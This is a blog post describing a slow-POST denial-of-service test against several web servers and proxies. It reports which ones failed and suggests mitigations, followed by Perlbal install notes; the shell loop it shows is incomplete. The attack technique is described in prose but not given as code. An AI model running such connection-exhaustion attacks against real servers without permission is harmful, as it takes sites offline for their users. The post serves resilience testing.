Phillip Pearson - web + electronics notes

tech notes and web hackery from a new zealander who was vaguely useful on the web back in 2002 (see: python community server, the blogging ecosystem, the new zealand coffee review, the internet topic exchange).


How other people can kill your web server: no fun and little profit :(

This is probably old news to anyone who's run anything spammable on the web for long enough, but there are bots out there that don't do HTTP particularly well. I had this problem with the Topic Exchange years ago and it just recently hit a couple of BBM's sites. It's now fixed (for some definition of "fixed") in both cases with a Python proxy I wrote to buffer uploads and responses.

Curious as to whether other "standard solutions" out there handle this situation, and also so I could test out my proxy, I wrote a script that makes many HTTP connections to a site, writes POST headers with a large Content-Length, then feeds a byte into each of them every now and then so they don't time out, but never actually finishes the POST.

It took down my development box within seconds, driving it so badly out of memory that the Linux OOM killer kicked in and tore the thing to shreds. Reducing MaxClients in the Apache config improved the situation to the point where the machine would stay up, but the script would still make the site inaccessible (and fill up the accept queue so that nobody would be able to get in even if a request ever did get fully posted). Apache stops accepting requests when it runs out of children, so the script just started getting rejected connects after a while. Killing the script (and closing all the sockets) resulted in the site being instantly accessible again.

Trying it out with my proxy in front, I ran it for a few minutes but killed it after it established lots of HTTP connections without affecting the site. My proxy's not particularly clever so you could cause the machine to run out of swap by feeding it gigabytes of data, but it seems fine with lots of connections, at least.

Testing it on a Rails site running on a Mongrel cluster behind nginx gave similar results: no memory exhaustion (as no child processes are spawned with Mongrel/nginx) but an inaccessible site. Interestingly, the site didn't come back for a few minutes after killing the script; nginx or Mongrel took a while to process all the disconnects, or something. Correction: nginx handled the attack flawlessly. I didn't realise, but in the first test there was actually a different proxy in front of nginx, which wasn't so well behaved. So Rails hackers running nginx+mongrel_cluster can rest easy; your sites are probably not susceptible to this!

One bit of software I thought would be able to take a beating without batting an eyelash is Perlbal. And it did... to a point. It seems to use quite a lot of memory per connection, and after 500 connections (at which point it was using something like 3G of virtual memory) it printed "Out of memory!" and died. This is kind of scary, as Perlbal doesn't auto-respawn by itself (at least with the provided debian/perlbal.init script). So if you're running Perlbal you might want to run it under something like supervise or monit, or just in a simple shell script like this:


while true; do
  /usr/local/bin/perlbal --daemon
  sleep 1

I've pinged the Perlbal dev list about this (I'm sure it would be possible to get it to stop accept()ing in low memory situations, or perhaps have it limit the number of simultaneous connections per IP -- or if this is a bug, to fix it.)

If anyone has a service running behind a different proxy/balancer that they wouldn't mind me running the script against, please drop me a line. Or for that matter if anyone has a web service that they're concerned is easily taken down, let me know... I'd be interested to see how resilient other proxies and web servers are.

Update: Thanks to Bruce Fitzsimons for letting me take down his Erlang server! New result: a fairly small web server (256M RAM, single CPU) running YAWS, accepted about a thousand sockets then died completely, as with Perlbal. The error was EMFILE: too many files open. The experiment will continue after Bruce does some tweaking :)

Update 2: Bruce upped his ulimit, and I have since been unable to bring his server down. So chalk this up as a success for YAWS, with appropriate configuration. (Details: it handles 3000 simultaneous connections quite happily. Appears to be forcibly closing old connections after getting > 1000 from one IP address - or this may be a bug in my code. More results later!)

Update 3, 2008-01-4: Summary of results so far:

Apache - blocked up immediately

Squid + Apache - blocked up immediately

nginx + Mongrel - happily accepts lots of connections without service interruption

Perlbal - happily accepts lots of connections, but dies eventually due to a bug?

YAWS (Erlang) - happily accepts lots of connections without service interruption

So the safest thing to do if you're running Apache is to throw nginx in front of it. Personally I'm waiting for a Perlbal patch, then I'm going to use it, as it has some cool features and looks very debuggable.

... more like this: [, , , , ]

Perlbal notes

Happy New Year! I came across some alarming results last night when testing out a script that simulates badly behaved spambots and am curious as to whether popular load balancers take care of the situation. (I ended up solving the issue in this case by using a reverse proxy I wrote myself a few years ago, but I'm sure someone else has done the same...)

First on the list to try is Perlbal.

Latest Debian install instructions:

sudo apt-get install subversion libbsd-resource-perl libcompress-zlib-perl libnet-netmask-perl libio-stringy-perl libwww-perl libdanga-socket-perl libdbi-perl

svn co

cd Perlbal-1.60

perl Makefile.PL

sudo make install

Debian has a libio-aio-perl package, but it doesn't seem to work for me at the moment (it may only be in unstable) so I installed it from CPAN:

sudo perl -MCPAN -e shell

install IO::AIO

Now you can run Perlbal like this:

perlbal --config=config filename